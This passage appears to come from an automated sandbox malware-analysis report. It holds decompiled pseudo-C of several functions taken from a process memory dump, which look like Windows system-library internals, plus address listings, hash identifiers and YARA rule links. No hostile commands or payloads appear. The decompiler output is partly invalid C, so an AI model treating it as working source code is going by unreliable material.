									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								E04CEFFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0x4dcb1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return E04D1B640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}































































                                                                                            0x04d05142
                                                                                            0x04d0514c
                                                                                            0x04d05150
                                                                                            0x04d05157
                                                                                            0x04d05159
                                                                                            0x04d0515e
                                                                                            0x04d05165
                                                                                            0x04d05169
                                                                                            0x04d0516c
                                                                                            0x04d05172
                                                                                            0x04d05176
                                                                                            0x04d0517a
                                                                                            0x04d0517a
                                                                                            0x04d0517a
                                                                                            0x04d0517f
                                                                                            0x04d46d8b
                                                                                            0x04d46d8e
                                                                                            0x04d46d91
                                                                                            0x04d46d95
                                                                                            0x04d46d98
                                                                                            0x04d46d9c
                                                                                            0x04d46da0
                                                                                            0x04d46da3
                                                                                            0x04d46da7
                                                                                            0x04d46e26
                                                                                            0x04d46e26
                                                                                            0x04d46e2a
                                                                                            0x04d051f9
                                                                                            0x04d051f9
                                                                                            0x04d051fe
                                                                                            0x04d46e33
                                                                                            0x04d46e33
                                                                                            0x04d46e39
                                                                                            0x04d46e3d
                                                                                            0x04d46e46
                                                                                            0x04d46e50
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d46e52
                                                                                            0x04d46e53
                                                                                            0x04d46e56
                                                                                            0x04d46e5d
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d46e5f
                                                                                            0x04d46e67
                                                                                            0x04d46e77
                                                                                            0x04d46e7f
                                                                                            0x04d46e80
                                                                                            0x04d46e88
                                                                                            0x04d46e90
                                                                                            0x04d46e9f
                                                                                            0x04d46ea5
                                                                                            0x04d46ea9
                                                                                            0x04d46eb1
                                                                                            0x04d46ebf
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d46ecf
                                                                                            0x04d46ed3
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d46edb
                                                                                            0x04d46ede
                                                                                            0x04d46ee1
                                                                                            0x04d46ee8
                                                                                            0x04d46eeb
                                                                                            0x04d46eed
                                                                                            0x04d46ef0
                                                                                            0x04d46ef4
                                                                                            0x04d46ef8
                                                                                            0x04d46efc
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d46f0d
                                                                                            0x04d46f11
                                                                                            0x04d46f32
                                                                                            0x04d46f37
                                                                                            0x04d46f3b
                                                                                            0x04d46f3e
                                                                                            0x04d46f41
                                                                                            0x04d46f46
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d46f4c
                                                                                            0x04d46f50
                                                                                            0x04d46f50
                                                                                            0x04d46f54
                                                                                            0x04d46f62
                                                                                            0x04d46f65
                                                                                            0x04d46f6d
                                                                                            0x04d46f7b
                                                                                            0x04d46f7b
                                                                                            0x04d46f93
                                                                                            0x04d46f98
                                                                                            0x04d46fa0
                                                                                            0x04d46fa6
                                                                                            0x04d46fb3
                                                                                            0x04d46fb6
                                                                                            0x04d46fbf
                                                                                            0x04d46fc1
                                                                                            0x04d46fd5
                                                                                            0x04d46fda
                                                                                            0x04d46fda
                                                                                            0x04d46fdd
                                                                                            0x04d46fe2
                                                                                            0x04d46fe7
                                                                                            0x04d46feb
                                                                                            0x04d46fef
                                                                                            0x04d46ff3
                                                                                            0x04d0520c
                                                                                            0x04d0520c
                                                                                            0x04d0520f
                                                                                            0x04d05215
                                                                                            0x04d05234
                                                                                            0x04d0523a
                                                                                            0x04d0523a
                                                                                            0x04d05244
                                                                                            0x04d05245
                                                                                            0x04d05246
                                                                                            0x04d05251
                                                                                            0x04d05251
                                                                                            0x04d46f13
                                                                                            0x04d46f17
                                                                                            0x04d46f17
                                                                                            0x04d46f18
                                                                                            0x04d46f1b
                                                                                            0x04d46f1f
                                                                                            0x04d46f23
                                                                                            0x00000000
                                                                                            0x04d46f28
                                                                                            0x04d05204
                                                                                            0x04d05204
                                                                                            0x04d05208
                                                                                            0x00000000
                                                                                            0x04d05208
                                                                                            0x04d05185
                                                                                            0x04d05188
                                                                                            0x04d0518a
                                                                                            0x04d0518e
                                                                                            0x04d05195
                                                                                            0x04d46db1
                                                                                            0x04d46db5
                                                                                            0x04d46db9
                                                                                            0x04d0519b
                                                                                            0x04d0519b
                                                                                            0x04d0519e
                                                                                            0x04d051a7
                                                                                            0x04d051a9
                                                                                            0x04d051a9
                                                                                            0x04d051b5
                                                                                            0x04d051b8
                                                                                            0x04d051bb
                                                                                            0x04d051be
                                                                                            0x04d051c1
                                                                                            0x04d051c5
                                                                                            0x04d051c9
                                                                                            0x04d051cd
                                                                                            0x04d051cd
                                                                                            0x04d051d8
                                                                                            0x04d051dc
                                                                                            0x04d051e0
                                                                                            0x04d46dcc
                                                                                            0x04d46dd0
                                                                                            0x04d46dd5
                                                                                            0x04d46ddd
                                                                                            0x04d46de1
                                                                                            0x04d46de1
                                                                                            0x04d46de5
                                                                                            0x04d46deb
                                                                                            0x04d46df1
                                                                                            0x04d46df7
                                                                                            0x04d46dfd
                                                                                            0x04d46e01
                                                                                            0x04d46e05
                                                                                            0x04d46e09
                                                                                            0x04d46e0d
                                                                                            0x04d46e11
                                                                                            0x04d46e11
                                                                                            0x04d051eb
                                                                                            0x04d46e1a
                                                                                            0x04d46e1f
                                                                                            0x04d46e21
                                                                                            0x04d46e23
                                                                                            0x00000000
                                                                                            0x04d051f1
                                                                                            0x04d051f1
                                                                                            0x00000000
                                                                                            0x04d051f1

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 39485a3d5c8a433225d921d343a1c17995347580962430b6e0d06fe77fc86dc4
                                                                                            • Instruction ID: ca4be400d2c5fa00f2c2c7264d538b38bb398548cb8571f0f669b077a7aae9da
                                                                                            • Opcode Fuzzy Hash: 39485a3d5c8a433225d921d343a1c17995347580962430b6e0d06fe77fc86dc4
                                                                                            • Instruction Fuzzy Hash: 64C123756083809FD354CF28C480A5AFBE1BF89304F148A6EF99A8B392D775E945CF52
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04D003E2, Relevance: .3, Instructions: 254COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 74%
                                                                                            			E04D003E2(signed int __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v56;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int _t58;
				char* _t64;
				intOrPtr _t65;
				signed int _t74;
				signed int _t79;
				char* _t83;
				intOrPtr _t84;
				signed int _t93;
				signed int _t94;
				signed char* _t95;
				signed int _t99;
				signed int _t100;
				signed char* _t101;
				signed int _t105;
				signed int _t119;
				signed int _t120;
				void* _t122;
				signed int _t123;
				signed int _t127;

				_v8 =  *0x4dcd360 ^ _t127;
				_t119 = __ecx;
				_t105 = __edx;
				_t118 = 0;
				_v20 = __edx;
				_t120 =  *(__ecx + 0x20);
				if(E04D00548(__ecx, 0) != 0) {
					_t56 = 0xc000022d;
					L23:
					return E04D1B640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
				} else {
					_v12 = _v12 | 0xffffffff;
					_t58 = _t120 + 0x24;
					_t109 =  *(_t120 + 0x18);
					_t118 = _t58;
					_v16 = _t58;
					E04CEB02A( *(_t120 + 0x18), _t118, 0x14a5);
					_v52 = 0x18;
					_v48 = 0;
					0x840 = 0x40;
					if( *0x4dc7c1c != 0) {
					}
					_v40 = 0x840;
					_v44 = _t105;
					_v36 = 0;
					_v32 = 0;
					if(E04CF7D50() != 0) {
						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t64 = 0x7ffe0384;
					}
					if( *_t64 != 0) {
						_t65 =  *[fs:0x30];
						__eflags =  *(_t65 + 0x240) & 0x00000004;
						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
							_t100 = E04CF7D50();
							__eflags = _t100;
							if(_t100 == 0) {
								_t101 = 0x7ffe0385;
							} else {
								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t101 & 0x00000020;
							if(( *_t101 & 0x00000020) != 0) {
								_t118 = _t118 | 0xffffffff;
								_t109 = 0x1485;
								E04D57016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					_t105 = 0;
					while(1) {
						_push(0x60);
						_push(5);
						_push( &_v64);
						_push( &_v52);
						_push(0x100021);
						_push( &_v12);
						_t122 = E04D19830();
						if(_t122 >= 0) {
							break;
						}
						__eflags = _t122 - 0xc0000034;
						if(_t122 == 0xc0000034) {
							L38:
							_t120 = 0xc0000135;
							break;
						}
						__eflags = _t122 - 0xc000003a;
						if(_t122 == 0xc000003a) {
							goto L38;
						}
						__eflags = _t122 - 0xc0000022;
						if(_t122 != 0xc0000022) {
							break;
						}
						__eflags = _t105;
						if(__eflags != 0) {
							break;
						}
						_t109 = _t119;
						_t99 = E04D569A6(_t119, __eflags);
						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						_t105 = _t105 + 1;
					}
					if( !_t120 >= 0) {
						L22:
						_t56 = _t120;
						goto L23;
					}
					if( *0x4dc7c04 != 0) {
						_t118 = _v12;
						_t120 = E04D5A7AC(_t119, _t118, _t109);
						__eflags = _t120;
						if(_t120 >= 0) {
							goto L10;
						}
						__eflags =  *0x4dc7bd8;
						if( *0x4dc7bd8 != 0) {
							L20:
							if(_v12 != 0xffffffff) {
								_push(_v12);
								E04D195D0();
							}
							goto L22;
						}
					}
					L10:
					_push(_v12);
					_t105 = _t119 + 0xc;
					_push(0x1000000);
					_push(0x10);
					_push(0);
					_push(0);
					_push(0xf);
					_push(_t105);
					_t120 = E04D199A0();
					if(_t120 < 0) {
						__eflags = _t120 - 0xc000047e;
						if(_t120 == 0xc000047e) {
							L51:
							_t74 = E04D53540(_t120);
							_t119 = _v16;
							_t120 = _t74;
							L52:
							_t118 = 0x1485;
							E04CDB1E1(_t120, 0x1485, 0, _t119);
							goto L20;
						}
						__eflags = _t120 - 0xc000047f;
						if(_t120 == 0xc000047f) {
							goto L51;
						}
						__eflags = _t120 - 0xc0000462;
						if(_t120 == 0xc0000462) {
							goto L51;
						}
						_t119 = _v16;
						__eflags = _t120 - 0xc0000017;
						if(_t120 != 0xc0000017) {
							__eflags = _t120 - 0xc000009a;
							if(_t120 != 0xc000009a) {
								__eflags = _t120 - 0xc000012d;
								if(_t120 != 0xc000012d) {
									_v28 = _t119;
									_push( &_v56);
									_push(1);
									_v24 = _t120;
									_push( &_v28);
									_push(1);
									_push(2);
									_push(0xc000007b);
									_t79 = E04D1AAF0();
									__eflags = _t79;
									if(_t79 >= 0) {
										__eflags =  *0x4dc8474 - 3;
										if( *0x4dc8474 != 3) {
											 *0x4dc79dc =  *0x4dc79dc + 1;
										}
									}
								}
							}
						}
						goto L52;
					}
					if(E04CF7D50() != 0) {
						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t83 = 0x7ffe0384;
					}
					if( *_t83 != 0) {
						_t84 =  *[fs:0x30];
						__eflags =  *(_t84 + 0x240) & 0x00000004;
						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
							_t94 = E04CF7D50();
							__eflags = _t94;
							if(_t94 == 0) {
								_t95 = 0x7ffe0385;
							} else {
								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t95 & 0x00000020;
							if(( *_t95 & 0x00000020) != 0) {
								E04D57016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
						if( *0x4dc8708 != 0) {
							_t118 =  *0x7ffe0330;
							_t123 =  *0x4dc7b00; // 0x0
							asm("ror esi, cl");
							 *0x4dcb1e0(_v12, _v20, 0x20);
							_t93 =  *(_t123 ^  *0x7ffe0330)();
							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
							asm("sbb esi, esi");
							_t120 =  ~_t50 & _t93;
						} else {
							_t120 = 0;
						}
					}
					if( !_t120 >= 0) {
						L19:
						_push( *_t105);
						E04D195D0();
						 *_t105 =  *_t105 & 0x00000000;
						goto L20;
					}
					_t120 = E04CE7F65(_t119);
					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
						__eflags = _t120;
						if(_t120 < 0) {
							goto L19;
						}
						 *(_t119 + 0x64) = _v12;
						goto L22;
					}
					goto L19;
				}
			}








































                                                                                            0x04d003f1
                                                                                            0x04d003f7
                                                                                            0x04d003f9
                                                                                            0x04d003fb
                                                                                            0x04d003fd
                                                                                            0x04d00400
                                                                                            0x04d0040a
                                                                                            0x04d44c7a
                                                                                            0x04d00537
                                                                                            0x04d00547
                                                                                            0x04d00410
                                                                                            0x04d00410
                                                                                            0x04d00414
                                                                                            0x04d00417
                                                                                            0x04d0041a
                                                                                            0x04d00421
                                                                                            0x04d00424
                                                                                            0x04d0042b
                                                                                            0x04d0043b
                                                                                            0x04d0043e
                                                                                            0x04d0043f
                                                                                            0x04d0043f
                                                                                            0x04d00446
                                                                                            0x04d00449
                                                                                            0x04d0044c
                                                                                            0x04d0044f
                                                                                            0x04d00459
                                                                                            0x04d44c8d
                                                                                            0x04d0045f
                                                                                            0x04d0045f
                                                                                            0x04d0045f
                                                                                            0x04d00467
                                                                                            0x04d44c97
                                                                                            0x04d44c9d
                                                                                            0x04d44ca4
                                                                                            0x04d44caa
                                                                                            0x04d44caf
                                                                                            0x04d44cb1
                                                                                            0x04d44cc3
                                                                                            0x04d44cb3
                                                                                            0x04d44cbc
                                                                                            0x04d44cbc
                                                                                            0x04d44cc8
                                                                                            0x04d44ccb
                                                                                            0x04d44cd7
                                                                                            0x04d44cda
                                                                                            0x04d44cdf
                                                                                            0x04d44cdf
                                                                                            0x04d44ccb
                                                                                            0x04d44ca4
                                                                                            0x04d0046d
                                                                                            0x04d0046f
                                                                                            0x04d0046f
                                                                                            0x04d00471
                                                                                            0x04d00476
                                                                                            0x04d0047a
                                                                                            0x04d0047b
                                                                                            0x04d00483
                                                                                            0x04d00489
                                                                                            0x04d0048d
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d44ce9
                                                                                            0x04d44cef
                                                                                            0x04d44d22
                                                                                            0x04d44d22
                                                                                            0x00000000
                                                                                            0x04d44d22
                                                                                            0x04d44cf1
                                                                                            0x04d44cf7
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d44cf9
                                                                                            0x04d44cff
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d44d05
                                                                                            0x04d44d07
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d44d0d
                                                                                            0x04d44d0f
                                                                                            0x04d44d14
                                                                                            0x04d44d16
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d44d1c
                                                                                            0x04d44d1c
                                                                                            0x04d00499
                                                                                            0x04d00535
                                                                                            0x04d00535
                                                                                            0x00000000
                                                                                            0x04d00535
                                                                                            0x04d004a6
                                                                                            0x04d44d2c
                                                                                            0x04d44d37
                                                                                            0x04d44d39
                                                                                            0x04d44d3b
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d44d41
                                                                                            0x04d44d48
                                                                                            0x04d00527
                                                                                            0x04d0052b
                                                                                            0x04d0052d
                                                                                            0x04d00530
                                                                                            0x04d00530
                                                                                            0x00000000
                                                                                            0x04d0052b
                                                                                            0x04d44d4e
                                                                                            0x04d004ac
                                                                                            0x04d004ac
                                                                                            0x04d004af
                                                                                            0x04d004b2
                                                                                            0x04d004b7
                                                                                            0x04d004b9
                                                                                            0x04d004bb
                                                                                            0x04d004bd
                                                                                            0x04d004bf
                                                                                            0x04d004c5
                                                                                            0x04d004c9
                                                                                            0x04d44d53
                                                                                            0x04d44d59
                                                                                            0x04d44db9
                                                                                            0x04d44dba
                                                                                            0x04d44dbf
                                                                                            0x04d44dc2
                                                                                            0x04d44dc4
                                                                                            0x04d44dc7
                                                                                            0x04d44dce
                                                                                            0x00000000
                                                                                            0x04d44dce
                                                                                            0x04d44d5b
                                                                                            0x04d44d61
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d44d63
                                                                                            0x04d44d69
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d44d6b
                                                                                            0x04d44d6e
                                                                                            0x04d44d74
                                                                                            0x04d44d76
                                                                                            0x04d44d7c
                                                                                            0x04d44d7e
                                                                                            0x04d44d84
                                                                                            0x04d44d89
                                                                                            0x04d44d8c
                                                                                            0x04d44d8d
                                                                                            0x04d44d92
                                                                                            0x04d44d95
                                                                                            0x04d44d96
                                                                                            0x04d44d98
                                                                                            0x04d44d9a
                                                                                            0x04d44d9f
                                                                                            0x04d44da4
                                                                                            0x04d44da6
                                                                                            0x04d44da8
                                                                                            0x04d44daf
                                                                                            0x04d44db1
                                                                                            0x04d44db1
                                                                                            0x04d44daf
                                                                                            0x04d44da6
                                                                                            0x04d44d84
                                                                                            0x04d44d7c
                                                                                            0x00000000
                                                                                            0x04d44d74
                                                                                            0x04d004d6
                                                                                            0x04d44de1
                                                                                            0x04d004dc
                                                                                            0x04d004dc
                                                                                            0x04d004dc
                                                                                            0x04d004e4
                                                                                            0x04d44deb
                                                                                            0x04d44df1
                                                                                            0x04d44df8
                                                                                            0x04d44dfe
                                                                                            0x04d44e03
                                                                                            0x04d44e05
                                                                                            0x04d44e17
                                                                                            0x04d44e07
                                                                                            0x04d44e10
                                                                                            0x04d44e10
                                                                                            0x04d44e1c
                                                                                            0x04d44e1f
                                                                                            0x04d44e35
                                                                                            0x04d44e35
                                                                                            0x04d44e1f
                                                                                            0x04d44df8
                                                                                            0x04d004f1
                                                                                            0x04d004fa
                                                                                            0x04d44e3f
                                                                                            0x04d44e47
                                                                                            0x04d44e5b
                                                                                            0x04d44e61
                                                                                            0x04d44e67
                                                                                            0x04d44e69
                                                                                            0x04d44e71
                                                                                            0x04d44e73
                                                                                            0x04d00500
                                                                                            0x04d00500
                                                                                            0x04d00500
                                                                                            0x04d004fa
                                                                                            0x04d00508
                                                                                            0x04d0051d
                                                                                            0x04d0051d
                                                                                            0x04d0051f
                                                                                            0x04d00524
                                                                                            0x00000000
                                                                                            0x04d00524
                                                                                            0x04d00515
                                                                                            0x04d00517
                                                                                            0x04d44e7a
                                                                                            0x04d44e7c
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d44e85
                                                                                            0x00000000
                                                                                            0x04d44e85
                                                                                            0x00000000
                                                                                            0x04d00517

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a9dd3c91c757a3a6325564e1064f50c0e4fe6ecce6669bcb70190061885b2790
                                                                                            • Instruction ID: f8ac6c424fa3f53900e7deb0d6e1f4fb686e5d5e9f52bf5a1bf46520a8fd0e0a
                                                                                            • Opcode Fuzzy Hash: a9dd3c91c757a3a6325564e1064f50c0e4fe6ecce6669bcb70190061885b2790
                                                                                            • Instruction Fuzzy Hash: D9914631F00255BFEB229F68D848BAD7BA4FB41724F054261E950AB2D1EB74FD80CB91
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04CDC600, Relevance: .2, Instructions: 225COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 67%
                                                                                            			E04CDC600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				char _v1036;
				signed int _v1040;
				char _v1048;
				signed int _v1052;
				signed char _v1056;
				void* _v1058;
				char _v1060;
				signed int _v1064;
				void* _v1068;
				intOrPtr _v1072;
				void* _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				intOrPtr _t72;
				signed int _t74;
				intOrPtr _t77;
				signed int _t78;
				signed int _t81;
				void* _t101;
				signed int _t102;
				signed int _t107;
				signed int _t109;
				signed int _t110;
				signed char _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t116;
				void* _t117;
				char _t118;
				void* _t120;
				char _t121;
				signed int _t122;
				signed int _t123;
				signed int _t125;

				_t125 = (_t123 & 0xfffffff8) - 0x424;
				_v8 =  *0x4dcd360 ^ _t125;
				_t116 = _a4;
				_v1056 = _a16;
				_v1040 = _a24;
				if(E04CE6D30( &_v1048, _a8) < 0) {
					L4:
					_pop(_t117);
					_pop(_t120);
					_pop(_t101);
					return E04D1B640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
				}
				_t70 = _a20;
				if(_t70 >= 0x3f4) {
					_t121 = _t70 + 0xc;
					L19:
					_t107 =  *( *[fs:0x30] + 0x18);
					__eflags = _t107;
					if(_t107 == 0) {
						L60:
						_t68 = 0xc0000017;
						goto L4;
					}
					_t72 =  *0x4dc7b9c; // 0x0
					_t74 = L04CF4620(_t107, _t107, _t72 + 0x180000, _t121);
					_v1064 = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L60;
					}
					_t102 = _t74;
					_push( &_v1060);
					_push(_t121);
					_push(_t74);
					_push(2);
					_push( &_v1048);
					_push(_t116);
					_t122 = E04D19650();
					__eflags = _t122;
					if(_t122 >= 0) {
						L7:
						_t114 = _a12;
						__eflags = _t114;
						if(_t114 != 0) {
							_t77 = _a20;
							L26:
							_t109 =  *(_t102 + 4);
							__eflags = _t109 - 3;
							if(_t109 == 3) {
								L55:
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									L59:
									_t122 = 0xc0000024;
									L15:
									_t78 = _v1052;
									__eflags = _t78;
									if(_t78 != 0) {
										L04CF77F0( *( *[fs:0x30] + 0x18), 0, _t78);
									}
									_t68 = _t122;
									goto L4;
								}
								_t110 = _v1056;
								_t118 =  *((intOrPtr*)(_t102 + 8));
								_v1060 = _t118;
								__eflags = _t110;
								if(_t110 == 0) {
									L10:
									_t122 = 0x80000005;
									L11:
									_t81 = _v1040;
									__eflags = _t81;
									if(_t81 == 0) {
										goto L15;
									}
									__eflags = _t122;
									if(_t122 >= 0) {
										L14:
										 *_t81 = _t118;
										goto L15;
									}
									__eflags = _t122 - 0x80000005;
									if(_t122 != 0x80000005) {
										goto L15;
									}
									goto L14;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
									goto L10;
								}
								_push( *((intOrPtr*)(_t102 + 8)));
								_t59 = _t102 + 0xc; // 0xc
								_push(_t110);
								L54:
								E04D1F3E0();
								_t125 = _t125 + 0xc;
								goto L11;
							}
							__eflags = _t109 - 7;
							if(_t109 == 7) {
								goto L55;
							}
							_t118 = 4;
							__eflags = _t109 - _t118;
							if(_t109 != _t118) {
								__eflags = _t109 - 0xb;
								if(_t109 != 0xb) {
									__eflags = _t109 - 1;
									if(_t109 == 1) {
										__eflags = _t114 - _t118;
										if(_t114 != _t118) {
											_t118 =  *((intOrPtr*)(_t102 + 8));
											_v1060 = _t118;
											__eflags = _t118 - _t77;
											if(_t118 > _t77) {
												goto L10;
											}
											_push(_t118);
											_t56 = _t102 + 0xc; // 0xc
											_push(_v1056);
											goto L54;
										}
										__eflags = _t77 - _t118;
										if(_t77 != _t118) {
											L34:
											_t122 = 0xc0000004;
											goto L15;
										}
										_t111 = _v1056;
										__eflags = _t111 & 0x00000003;
										if((_t111 & 0x00000003) == 0) {
											_v1060 = _t118;
											__eflags = _t111;
											if(__eflags == 0) {
												goto L10;
											}
											_t42 = _t102 + 0xc; // 0xc
											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
											_v1048 =  *((intOrPtr*)(_t102 + 8));
											_push(_t111);
											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
											_push(0);
											_push( &_v1048);
											_t122 = E04D113C0(_t102, _t118, _t122, __eflags);
											L44:
											_t118 = _v1072;
											goto L11;
										}
										_t122 = 0x80000002;
										goto L15;
									}
									_t122 = 0xc0000024;
									goto L44;
								}
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									goto L59;
								}
								_t118 = 8;
								__eflags = _t77 - _t118;
								if(_t77 != _t118) {
									goto L34;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
									goto L34;
								}
								_t112 = _v1056;
								_v1060 = _t118;
								__eflags = _t112;
								if(_t112 == 0) {
									goto L10;
								}
								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
								goto L11;
							}
							__eflags = _t114 - _t118;
							if(_t114 != _t118) {
								goto L59;
							}
							__eflags = _t77 - _t118;
							if(_t77 != _t118) {
								goto L34;
							}
							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
								goto L34;
							}
							_t113 = _v1056;
							_v1060 = _t118;
							__eflags = _t113;
							if(_t113 == 0) {
								goto L10;
							}
							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
							goto L11;
						}
						_t118 =  *((intOrPtr*)(_t102 + 8));
						__eflags = _t118 - _a20;
						if(_t118 <= _a20) {
							_t114 =  *(_t102 + 4);
							_t77 = _t118;
							goto L26;
						}
						_v1060 = _t118;
						goto L10;
					}
					__eflags = _t122 - 0x80000005;
					if(_t122 != 0x80000005) {
						goto L15;
					}
					L04CF77F0( *( *[fs:0x30] + 0x18), 0, _t102);
					L18:
					_t121 = _v1060;
					goto L19;
				}
				_push( &_v1060);
				_push(0x400);
				_t102 =  &_v1036;
				_push(_t102);
				_push(2);
				_push( &_v1048);
				_push(_t116);
				_t122 = E04D19650();
				if(_t122 >= 0) {
					__eflags = 0;
					_v1052 = 0;
					goto L7;
				}
				if(_t122 == 0x80000005) {
					goto L18;
				}
				goto L4;
			}










































                                                                                            0x04cdc608
                                                                                            0x04cdc615
                                                                                            0x04cdc625
                                                                                            0x04cdc62d
                                                                                            0x04cdc635
                                                                                            0x04cdc640
                                                                                            0x04cdc680
                                                                                            0x04cdc687
                                                                                            0x04cdc688
                                                                                            0x04cdc689
                                                                                            0x04cdc694
                                                                                            0x04cdc694
                                                                                            0x04cdc642
                                                                                            0x04cdc64a
                                                                                            0x04cdc697
                                                                                            0x04d47a25
                                                                                            0x04d47a2b
                                                                                            0x04d47a2e
                                                                                            0x04d47a30
                                                                                            0x04d47bea
                                                                                            0x04d47bea
                                                                                            0x00000000
